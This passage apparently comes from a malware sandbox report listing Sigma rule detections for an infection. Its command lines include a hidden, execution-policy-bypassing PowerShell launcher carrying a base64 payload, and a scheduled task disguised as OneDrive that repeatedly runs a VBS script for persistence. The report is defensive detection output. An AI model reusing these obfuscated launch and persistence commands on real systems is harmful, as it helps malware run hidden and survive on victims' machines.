dAAQ9uKQ6TIf+3vsukp/GNnIFwptoZPIpuU/SCdXIbj8y+HklsjAHv05q9v6buc8PtnZ//qBOn/Cpz90lQV0wNZBHFablSqqK0f4mJRXKFhJAGQxKw0e9RgorGm5qgwoXZiFDamGZ2LTTry0NA4ga0KQxWBDl
              Sigma detected: Invoke-Obfuscation CLIP+ Launcher
              Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $temp='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
              Sigma detected: Invoke-Obfuscation VAR+ Launcher
              Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $temp='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
              Sigma detected: Potential PowerShell Command Line Obfuscation
              Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $temp='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
              Sigma detected: Potentially Suspicious PowerShell Child Processes
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\system32\schtasks.exe" /create /TN OneDriveCoreTask-S-1-5-21-5466262771-899953646639-1001 /SC minute /mo 4 /tr C:\Users\Public\Libraries\Recorded.vbs /f, CommandLine: "C:\Windows\system32\schtasks.exe" /create /TN OneDriveCoreTask-S-1-5-21-5466262771-899953646639-1001 /SC minute /mo 4 /tr C:\Users\Public\Libraries\Recorded.vbs /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $temp='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
              Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $temp='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
              Sigma detected: Script Interpreter Execution From Suspicious Folder
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $temp='JVBERi0xLjQKJeLjz9MNCjEgMCBvYmoKPDwgCi9DcmVhdG9yIChDYW5vbiBpUi1BRFYgNjU1NSAgUERGKQovQ3JlYXRpb25EYXRlIChEOjIwMjMwMjEzMDg1OTU3KzAxJzAwJykKL1Byb2R1Y2VyIChcMzc2XDM3N1wwMDBBXDAwMGRcMDAwb1wwMDBiXDAwMGVcMDAwIFwwMDBQXDAwMFNcMDAwTFwwMDAgXDAwMDFcMDAwLlwwMDBcCjNcMDAwZVwwMDAgXDAwMGZcMDAwb1wwMDByXDAwMCBcMDAwQ1wwMDBhXDAwMG5cMDAwb1wwMDBuXDAwMFwwMDApCj4+IAplbmRvYmoKMiAwIG9iago8PCAKL1BhZ2VzIDMgMCBSIAovVHlwZSAvQ2F0YWxvZyAKL091dHB1dEludGVudHMgMTIgMCBSIAovTWV0YWRhdGEgMTMgMCBSIAo+PiAKZW5kb2JqCjQgMCBvYmoKPDwgL1R5cGUgL1hPYmplY3QgL1N1YnR5cGUgL0ltYWdlIC9XaWR0aCAxMjQwIC9IZWlnaHQgMTc1MyAvQml0c1BlckNvbXBvbmVudCA4IAovQ29sb3JTcGFjZSAvRGV2aWNlR3JheSAvRmlsdGVyIFsgL0ZsYXRlRGVjb2RlIC9EQ1REZWNvZGUgXSAvTGVuZ3R